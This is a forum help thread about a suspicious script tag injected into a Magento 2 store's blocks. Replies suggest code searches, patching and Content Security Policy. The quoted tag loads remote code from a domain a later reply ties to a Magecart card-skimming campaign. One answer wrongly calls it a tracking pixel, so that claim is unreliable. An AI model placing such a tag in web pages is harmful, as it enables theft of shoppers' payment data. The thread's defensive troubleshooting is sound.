Preventing Automatic Script Injection in Magento 2: How to Stop Unwanted Scripts from Being Added?
I've noticed the following script being automatically injected into our Magento 2 blocks:
<script src="https://pixelia.shop/img/"></script>

We didn't add this, and it seems suspicious, possibly indicating malicious code. Could someone explain:
How is this script being added to our blocks?
How can we prevent this and secure our Magento 2 site?
Any guidance would be appreciated.

Pixelia is a tracking pixel or analytics script, which is often used to track user behavior, gather data, or integrate with third-party services.
Please check in the third party module if this integration is not done by you from Admin Section, then you find it in code using this command.
grep -r "pixelia".

To secure our Magento 2 site, Please upgrade your site to latest version with all latest patches.

is it possible to block the content from the 3rd party site 'https://pixelia.shop'.

You can enable CSP, which will allow only whitelisted domains to function.

pixelia.shop is not a tracking pixel, it's part of a magecart campaign designed to steal credit card information, check out https://sansec.io/research/cosmicsting-hitting-major-stores

Using the CSP module you can allow/disallow external script (js) requests.
